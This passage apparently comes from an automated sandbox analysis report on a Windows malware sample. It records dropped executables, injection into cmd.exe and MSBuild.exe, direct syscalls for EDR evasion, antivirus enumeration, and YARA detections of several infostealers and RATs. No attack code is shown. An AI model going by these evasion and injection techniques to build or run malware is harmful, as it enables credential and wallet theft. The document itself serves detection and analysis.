Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00D06678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00D06678
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_6C9D2782 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6C9D2782
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_6C9D90E9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C9D90E9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	NtQuerySystemInformation: Direct from: 0xBF5BE4
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	NtSetInformationThread: Direct from: 0x6C8E617C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	NtSetInformationThread: Direct from: 0x6C30617C
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe

Code function: 1_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

1_2_00415D00

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A781000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 244008	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A781000
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6F6008

Source: C:\Users\user\Desktop\VucRf0jboS.exe	Process created: C:\Users\user\AppData\Local\Temp\u5qk.0.exe "C:\Users\user\AppData\Local\Temp\u5qk.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Process created: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe "C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Process created: C:\Users\user\AppData\Local\Temp\u5qk.3.exe "C:\Users\user\AppData\Local\Temp\u5qk.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe "C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe"

Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe

Code function: 3_2_6C8E3470 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,

3_2_6C8E3470

Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe

3_2_6C8E3470

Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp	Binary or memory string: TrayNotifyWndShell_TrayWnd
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32SVWU
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32S

Source: C:\Users\user\Desktop\VucRf0jboS.exe

Code function: 0_2_00409D1B cpuid

0_2_00409D1B

Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042086B
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: EnumSystemLocalesW,	0_2_004170F1
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: EnumSystemLocalesW,	0_2_004201F6
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: EnumSystemLocalesW,	0_2_004201AB
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: EnumSystemLocalesW,	0_2_00420291
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042031E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: GetLocaleInfoW,	0_2_004174E4
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: GetLocaleInfoW,	0_2_0042056E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00420697
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0041FF33
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: GetLocaleInfoW,	0_2_0042079E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: EnumSystemLocalesW,	0_2_04160412
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: EnumSystemLocalesW,	0_2_0416045D
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: EnumSystemLocalesW,	0_2_041604F8
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: GetLocaleInfoW,	0_2_0415774B
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: GetLocaleInfoW,	0_2_041607D5
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: GetLocaleInfoW,	0_2_041607D3
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_041608FE
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0416019A
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: GetLocaleInfoW,	0_2_04160A05
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_04160AD2
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: EnumSystemLocalesW,	0_2_04157358
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	1_2_00414570

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\Desktop\VucRf0jboS.exe

Code function: 0_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_0040996D

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe

Code function: 1_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,

1_2_004143C0

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe

Code function: 1_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

1_2_004144B0

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe

Code function: 1_2_6BB88390 NSS_GetVersion,

1_2_6BB88390

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: 1.2.u5qk.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5qk.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5qk.0.exe.5c70e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5qk.0.exe.5ca0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5qk.0.exe.5ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1758935505.0000000005CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb370000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e901eeb15.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb370000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb550000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb550000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e901749f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e900c6ca8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee882432f.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54c537d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee8848739.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54e4dad.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54d47a3.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee87fd525.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2395167883.0000020EE543B000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 18.2.MSBuild.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.54c00c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.52100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.54c00c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.52100c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2523771095.0000000000902000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2525694505.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2326661645.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 3052, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\nkho, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\ssfwvk, type: DROPPED

Yara detected SectopRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 7596, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.2493025545.000000000406A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5qk.0.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 1.2.u5qk.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5qk.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5qk.0.exe.5c70e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5qk.0.exe.5ca0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5qk.0.exe.5ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1758935505.0000000005CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5qk.0.exe PID: 7516, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e900c6ca8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee882432f.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54c537d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee8848739.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54e4dad.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54d47a3.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee87fd525.5.raw.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

